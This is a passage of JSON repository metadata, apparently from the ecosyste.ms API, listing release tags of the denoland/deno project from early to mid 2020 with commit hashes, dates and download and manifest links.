sts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/ho